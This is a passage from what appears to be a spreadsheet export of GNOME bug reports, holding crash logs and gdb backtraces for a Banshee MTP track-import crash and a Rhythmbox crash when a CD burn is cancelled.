(Banshee:3880): GdkPixbuf-WARNING **: GdkPixbufLoader finalized without calling gdk_pixbuf_loader_close() - this is not allowed. You must explicitly end the data stream to the loader before dropping the last reference.
(Banshee:3880): GdkPixbuf-WARNING **: GdkPixbufLoader finalized without calling gdk_pixbuf_loader_close() - this is not allowed. You must explicitly end the data stream to the loader before dropping the last reference.
(Banshee:3880): GdkPixbuf-WARNING **: GdkPixbufLoader finalized without calling gdk_pixbuf_loader_close() - this is not allowed. You must explicitly end the data stream to the loader before dropping the last reference.
Debug: [04.04.2007 23:10:38] (MTP: importing tracks) - 
Index (zero based) must be greater than or equal to zero and less than the size of the argument list.
System.FormatException: Index (zero based) must be greater than or equal to zero and less than the size of the argument list.
  at System.String.FormatHelper (System.Text.StringBuilder result IFormatProvider provider System.String format System.Object[] args) [0x00000] 
  at System.String.Format (IFormatProvider provider System.String format System.Object[] args) [0x00000] 
  at System.String.Format (System.String format System.Object arg0) [0x00000] 
  at Banshee.Dap.Mtp.MtpDap.Import (IEnumerable`1 tracks Banshee.Sources.PlaylistSource playlist) [0x00124] in /home/jukka/Download/Banshee/banshee-0.11.7/src/Dap/Banshee.Dap.Mtp/MtpDap.cs:325 
  at Banshee.Sources.DapSource.Import (IEnumerable`1 tracks Banshee.Sources.PlaylistSource playlist) [0x00024] in /home/jukka/Download/Banshee/banshee-0.11.7/src/Core/Banshee.Base/Sources/DapSource.cs:179 
  at Banshee.Sources.DapSource.Import (IEnumerable`1 tracks) [0x00000] in /home/jukka/Download/Banshee/banshee-0.11.7/src/Core/Banshee.Base/Sources/DapSource.cs:214 
  at Banshee.Sources.DapSource.Import () [0x00000] in /home/jukka/Download/Banshee/banshee-0.11.7/src/Core/Banshee.Base/Sources/DapSource.cs:148 
  at Banshee.PlayerUI.OnImportSourceAction (System.Object o System.EventArgs args) [0x00015] in /home/jukka/Download/Banshee/banshee-0.11.7/src/Core/Banshee/PlayerInterface.cs:2002 
  at (wrapper delegate-invoke) System.MulticastDelegate:invoke_void_object_EventArgs (objectSystem.EventArgs)
  at GLib.Signal.voidObjectCallback (IntPtr handle IntPtr gch) [0x00000] 
  at (wrapper native-to-managed) GLib.Signal:voidObjectCallback (intptrintptr)
  at  
  at (wrapper managed-to-native) Gtk.Application:gtk_main ()
  at Gtk.Application.Run () [0x00000] 
  at Banshee.BansheeEntry.Startup (System.String[] args) [0x00298] in /home/jukka/Download/Banshee/banshee-0.11.7/src/Core/Banshee/Main.cs:110 
  at (wrapper delegate-invoke) System.MulticastDelegate:invoke_void_string[] (string[])
  at Banshee.Gui.CleanRoomStartup.Startup (Banshee.Gui.StartupInvocationHandler startup System.String[] args) [0x00045] in /home/jukka/Download/Banshee/banshee-0.11.7/src/Core/Banshee.Base/Gui/CleanRoomStartup.cs:54 
=================================================================
Got a SIGSEGV while executing native code. This usually indicates
a fatal error in the mono runtime or one of the native libraries 
used by your application.
=================================================================
Stacktrace:
  at (wrapper managed-to-native) Gtk.Button.gtk_button_new_from_stock (intptr) 
  at (wrapper managed-to-native) Gtk.Button.gtk_button_new_from_stock (intptr) 
  at Gtk.Button..ctor (string) 
  at Banshee.Gui.Dialogs.ExceptionDialog.AddButton (stringGtk.ResponseTypebool) [0x00000] in /home/jukka/Download/Banshee/banshee-0.11.7/src/Core/Banshee.Base/Gui/ExceptionDialog.cs:118
  at Banshee.Gui.Dialogs.ExceptionDialog..ctor (System.Exception) [0x00202] in /home/jukka/Download/Banshee/banshee-0.11.7/src/Core/Banshee.Base/Gui/ExceptionDialog.cs:113
  at Banshee.Gui.CleanRoomStartup.Startup (Banshee.Gui.CleanRoomStartup/StartupInvocationHandlerstring[]) [0x0006b] in /home/jukka/Download/Banshee/banshee-0.11.7/src/Core/Banshee.Base/Gui/CleanRoomStartup.cs:60
  at Banshee.BansheeEntry.Main (string[]) [0x00000] in /home/jukka/Download/Banshee/banshee-0.11.7/src/Core/Banshee/Main.cs:43
  at (wrapper runtime-invoke) System.Object.runtime_invoke_void_string[] (objectintptrintptrintptr) 
Native stacktrace:
        mono [0x815fb16]
        mono [0x8129e47]
        [0xb7f65440]
        /opt/gnome/lib/libgobject-2.0.so.0(g_signal_emit+0x35) [0xb66e3415]
        /opt/gnome/lib/libgobject-2.0.so.0 [0xb66d5051]
        /opt/gnome/lib/libgobject-2.0.so.0 [0xb66d19df]
        /opt/gnome/lib/libgobject-2.0.so.0(g_object_thaw_notify+0x1d1) [0xb66d5761]
        /opt/gnome/lib/libgtk-x11-2.0.so.0(gtk_image_set_from_stock+0x9f) [0xb69753bf]
        /opt/gnome/lib/libgtk-x11-2.0.so.0(gtk_image_new_from_stock+0x44) [0xb6975b74]
        /opt/gnome/lib/libgtk-x11-2.0.so.0 [0xb68cb67f]
        /opt/gnome/lib/libgtk-x11-2.0.so.0 [0xb68cba98]
        /opt/gnome/lib/libgobject-2.0.so.0(g_object_newv+0x2cb) [0xb66d5a7b]
        /opt/gnome/lib/libgobject-2.0.so.0(g_object_new_valist+0x2c8) [0xb66d6688]
        /opt/gnome/lib/libgobject-2.0.so.0(g_object_new+0x40) [0xb66d6790]
        /opt/gnome/lib/libgtk-x11-2.0.so.0(gtk_button_new_from_stock+0x5c) [0xb68cb27c]
        [0xb25faf85]
        [0xb25faf11]
        [0xb25fad78]
        [0xb25f7928]
        [0xb73f2f80]
        [0xb73f2259]
        [0xb73f2063]
        mono(mono_runtime_exec_main+0x62) [0x80db852]
        mono(mono_runtime_run_main+0x1b9) [0x80dbb39]
        mono(mono_main+0xe47) [0x8058de7]
        mono [0x8057ab2]
        /lib/libc.so.6(__libc_start_main+0xdc) [0xb7d46f9c]
        mono [0x8057a01]
Debug info from gdb:
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1210906400 (LWP 3880)]
[New Thread -1282237552 (LWP 3889)]
[New Thread -1283355760 (LWP 3888)]
[New Thread -1263559792 (LWP 3884)]
[New Thread -1220609136 (LWP 3882)]
[New Thread -1220527216 (LWP 3881)]
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
0xb7f65410 in ?? ()
  6 Thread -1220527216 (LWP 3881)  0xb7f65410 in ?? ()
  5 Thread -1220609136 (LWP 3882)  0xb7f65410 in ?? ()
  4 Thread -1263559792 (LWP 3884)  0xb7f65410 in ?? ()
  3 Thread -1283355760 (LWP 3888)  0xb7f65410 in ?? ()
  2 Thread -1282237552 (LWP 3889)  0xb7f65410 in ?? ()
  1 Thread -1210906400 (LWP 3880)  0xb7f65410 in ?? ()
Thread 6 (Thread -1220527216 (LWP 3881)):
#0  0xb7f65410 in ?? ()
#1  0xb74033b8 in ?? ()
#2  0x081f0ff4 in ?? ()
#3  0x00000000 in ?? ()
Thread 5 (Thread -1220609136 (LWP 3882)):
#0  0xb7f65410 in ?? ()
#1  0xb73ef1b8 in ?? ()
#2  0x0000002b in ?? ()
#3  0x00000000 in ?? ()
Thread 4 (Thread -1263559792 (LWP 3884)):
#0  0xb7f65410 in ?? ()
#1  0xb4af90c8 in ?? ()
#2  0x00000e97 in ?? ()
#3  0x00000000 in ?? ()
Thread 3 (Thread -1283355760 (LWP 3888)):
#0  0xb7f65410 in ?? ()
#1  0xb38182e8 in ?? ()
#2  0xffffffff in ?? ()
#3  0x00000005 in ?? ()
#4  0xb7de6ea3 in poll () from /lib/libc.so.6
#5  0xb7ed7e53 in g_main_context_prepare ()
   from /opt/gnome/lib/libglib-2.0.so.0
#6  0xb7ed81c9 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
#7  0xb6e28300 in link_set_io_thread () from /opt/gnome/lib/libORBit-2.so.0
#8  0xb7ef2cdf in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
#9  0xb7e8a112 in start_thread () from /lib/libpthread.so.0
#10 0xb7df02ee in clone () from /lib/libc.so.6
Thread 2 (Thread -1282237552 (LWP 3889)):
#0  0xb7f65410 in ?? ()
#1  0xb39290b4 in ?? ()
#2  0x00000e97 in ?? ()
#3  0x00000000 in ?? ()
Thread 1 (Thread -1210906400 (LWP 3880)):
#0  0xb7f65410 in ?? ()
#1  0xb7c0d338 in ?? ()
#2  0x00000000 in ?? ()
#0  0xb7f65410 in ?? ()
Abgebrochen
Other information:
I reproduced the error on the following versions 0.11.7 0.12.1 and svn
OpenSuse 10.2
compiled with --enable-mtp</t>
  </si>
  <si>
    <t>alan.mcgovern</t>
  </si>
  <si>
    <t>nop</t>
  </si>
  <si>
    <t>RHYTHMBOX-327422</t>
  </si>
  <si>
    <t>playback</t>
  </si>
  <si>
    <t>crash cancelling burn</t>
  </si>
  <si>
    <t>Crash when cancelling burn during the convert state.
Backtrace was generated from '/home/gnome/bin/rhythmbox'
Using host libthread_db library /lib/libthread_db.so.1.
`shared object read from target memory' has disappeared keeping its symbols.
[Thread debugging using libthread_db enabled]
[New Thread -1208863040 (LWP 7173)]
[New Thread 102767536 (LWP 7208)]
[New Thread 54131632 (LWP 7206)]
[New Thread 13372336 (LWP 7175)]
[New Thread 66243504 (LWP 7174)]
0x00619402 in __kernel_vsyscall ()
#0  0x00619402 in __kernel_vsyscall ()
#1  0x002b2fbb in __waitpid_nocancel () from /lib/libpthread.so.0
#2  0x001911fb in libgnomeui_segv_handle (signum=5) at gnome-ui-init.c:786
#3  
#4  IA__g_logv (log_domain=) at gmessages.c:503
#5  0x01a4a8cb in IA__g_log (log_domain=0x67bc24 GStreamer log_level=G_LOG_LEVEL_CRITICAL 
    format=0x67ff88 \nTrying to dispose element %s but it is not in the NULL state.\nYou need to explicitly set elements to the NULL state before\ndropping the final reference to allow them to clean up.\n) at gmessages.c:517
#6  0x00642af9 in gst_element_dispose (object=0x973e290) at gstelement.c:2398
#7  0x00ac451f in IA__g_object_unref (_object=0x973e290) at gobject.c:1734
#8  0x00631f65 in gst_object_unref (object=0x973e290) at gstobject.c:414
#9  0x0063494d in gst_bin_remove_func (bin=0x97708e0 element=0x973e290) at gstbin.c:918
#10 0x00634567 in gst_bin_remove (bin=0x97708e0 element=0x973e290) at gstbin.c:975
#11 0x0063464c in gst_bin_dispose (object=0x97708e0) at gstbin.c:389
#12 0x00655959 in gst_pipeline_dispose (object=0x97708e0) at gstpipeline.c:180
#13 0x00ac451f in IA__g_object_unref (_object=0x97708e0) at gobject.c:1734
#14 0x00631f65 in gst_object_unref (object=0x97708e0) at gstobject.c:414
#15 0x080b2601 in rb_recorder_gst_free_pipeline (recorder=0x9277488) at rb-recorder-gst.c:308
#16 0x080b2af3 in rb_recorder_finalize (object=0x9277488) at rb-recorder-gst.c:667
#17 0x00ac4591 in IA__g_object_unref (_object=0x9277488) at gobject.c:1762
#18 0x08095c8a in rb_playlist_source_recorder_finalize (object=0x9729008) at rb-playlist-source-recorder.c:1341
#19 0x00ac4591 in IA__g_object_unref (_object=0x9729008) at gobject.c:1762
#20 0x00ac1df2 in IA__g_closure_invoke (closure=0x96c52c0 return_value=0x0 n_param_values=1 param_values=0xbf844fcc 
    invocation_hint=0xbf844ecc) at gclosure.c:187
#21 0x00ad179f in signal_emit_unlocked_R (node=0x93563b8 detail=0 instance=0x9277320 emission_return=0x0 
    instance_and_params=0xbf844fcc) at gsignal.c:2438
#22 0x00ad2cc7 in IA__g_signal_emit_valist (instance=0x9277320 signal_id=164 detail=0 var_args=0xbf8451cc Ã€{\t0\001Â¯)
    at gsignal.c:2197
#23 0x00ad304f in IA__g_signal_emit (instance=0x9277320 signal_id=164 detail=0) at gsignal.c:2241
#24 0x0103348f in IA__gtk_button_clicked (button=0x9277320) at gtkbutton.c:834
#25 0x01034b91 in gtk_real_button_released (button=0x9277320) at gtkbutton.c:1369
#26 0x00ace22e in IA__g_cclosure_marshal_VOID__VOID (closure=0x93589c8 return_value=0x0 n_param_values=1 param_values=0xbf8454ac 
    invocation_hint=0xbf8453ac marshal_data=0x1034b50) at gmarshal.c:77
#27 0x00ac17c1 in g_type_class_meta_marshal (closure=0x93589c8 return_value=0x0 n_param_values=1 param_values=0xbf8454ac 
    invocation_hint=0xbf8453ac marshal_data=0x1a4) at gclosure.c:567
#28 0x00ac1daa in IA__g_closure_invoke (closure=0x93589c8 return_value=0x0 n_param_values=1 param_values=0xbf8454ac 
    invocation_hint=0xbf8453ac) at gclosure.c:490
#29 0x00ad104b in signal_emit_unlocked_R (node=0x93589f0 detail=0 instance=0x9277320 emission_return=0x0 
    instance_and_params=0xbf8454ac) at gsignal.c:2368
#30 0x00ad2cc7 in IA__g_signal_emit_valist (instance=0x9277320 signal_id=163 detail=0 
    var_args=0xbf8456ac Ã€{\tÂ¸Â±'\0018B\003\001Ã˜V\204Â¿[B\003\001 s'\t\002\200) at gsignal.c:2197
#31 0x00ad304f in IA__g_signal_emit (instance=0x9277320 signal_id=163 detail=0) at gsignal.c:2241
#32 0x01033413 in IA__gtk_button_released (button=0x9277320) at gtkbutton.c:826
#33 0x0103425b in gtk_button_button_release (widget=0x9277320 event=0x97831f0) at gtkbutton.c:1262
#34 0x010e2b2f in _gtk_marshal_BOOLEAN__BOXED (closure=0x92e9b78 return_value=0xbf8458a0 n_param_values=2 param_values=0xbf84598c 
    invocation_hint=0xbf84588c marshal_data=0x1034238) at gtkmarshalers.c:83
#35 0x00ac17c1 in g_type_class_meta_marshal (closure=0x92e9b78 return_value=0xbf8458a0 n_param_values=2 param_values=0xbf84598c 
    invocation_hint=0xbf84588c marshal_data=0xb4) at gclosure.c:567
#36 0x00ac1daa in IA__g_closure_invoke (closure=0x92e9b78 return_value=0xbf8458a0 n_param_values=2 param_values=0xbf84598c 
    invocation_hint=0xbf84588c) at gclosure.c:490
#37 0x00ad1983 in signal_emit_unlocked_R (node=0x92e9e88 detail=0 instance=0x9277320 emission_return=0xbf845b0c 
    instance_and_params=0xbf84598c) at gsignal.c:2476
#38 0x00ad2a98 in IA__g_signal_emit_valist (instance=0x9277320 signal_id=62 detail=0 
    var_args=0xbf845b90 Â¸[\204Â¿Ã~4\tÃˆ[\204Â¿\215J\033\001 s'\tÃ ?\t s'\t\230M\033\001$s'\t\001) at gsignal.c:2207
#39 0x00ad304f in IA__g_signal_emit (instance=0x9277320 signal_id=62 detail=0) at gsignal.c:2241
#40 0x011b4be6 in gtk_widget_event_internal (widget=0x9277320 event=0x97831f0) at gtkwidget.c:3735
#41 0x010e12ff in IA__gtk_propagate_event (widget=0x9277320 event=0x97831f0) at gtkmain.c:2175
#42 0x010e1704 in IA__gtk_main_do_event (event=0x97831f0) at gtkmain.c:1412
#43 0x007e447d in gdk_event_dispatch (source=0x92b6870 callback=0 user_data=0x0) at gdkevents-x11.c:2291
#44 0x01a42696 in IA__g_main_context_dispatch (context=0x92b68b8) at gmain.c:1916
#45 0x01a4552e in g_main_context_iterate (context=0x92b68b8 block=1 dispatch=1 self=0x924b890) at gmain.c:2547
#46 0x01a45a2f in IA__g_main_loop_run (loop=0x9352760) at gmain.c:2751
#47 0x0021a03e in bonobo_main () at bonobo-main.c:312
#48 0x080672d5 in main (argc=1 argv=0xbf846194) at main.c:398
Thread 5 (Thread 66243504 (LWP 7174)):
#0  0x00619402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x002afa1c in pthread_cond_timedwait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0x0013553b in g_cond_timed_wait_posix_impl (cond=0x93469b0 entered_mutex=0x9344760 abs_time=0x3f2c40c) at gthread-posix.c:229
	result = 
Thread 4 (Thread 13372336 (LWP 7175)):
#0  0x00619402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x01b87a5c in poll () from /lib/libc.so.6
No symbol table info available.
#2  0x01a45444 in g_main_context_iterate (context=0x9346740 block=1 dispatch=1 self=0x9346110) at gmain.c:2849
	max_priority = 2147483647
	timeout = -1
	some_ready = 
Thread 3 (Thread 54131632 (LWP 7206)):
#0  0x00619402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x002af7a6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0x00663606 in gst_task_func (task=0x97832e0 tclass=0x927f3a8) at gsttask.c:174
	t = 1
	lock = (GStaticRecMutex *) 0x9289c10
	__PRETTY_FUNCTION__ = gst_task_func
#3  0x01a5f52b in g_thread_pool_thread_proxy (data=0x927f438) at gthreadpool.c:172
	task = 0x97832e0
	goto_global_pool = 1
	len = 
Thread 2 (Thread 102767536 (LWP 7208)):
#0  0x00619402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x002af7a6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0x0065fb27 in gst_system_clock_async_thread (clock=0x96f8010) at gstsystemclock.c:253
	entry = 
Thread 1 (Thread -1208863040 (LWP 7173)):
#0  0x00619402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x002b2fbb in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#2  0x001911fb in libgnomeui_segv_handle (signum=5) at gnome-ui-init.c:786
	estatus = 29278196
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} sa_mask = {__val = {3083780468 22278 3213116216 158969272 
      11469104 29278196 29284536 117 3213116292 28173223 3213116412 158563348 158854596 3179950 0 158969088 158884608 
      158917248 3213116356 28492946 29284480 32640 29278196 0 0 3213116432 28169281 32640 28485738 72 3213116424 
      29279008}} sa_flags = 158854620 sa_restorer = 0x2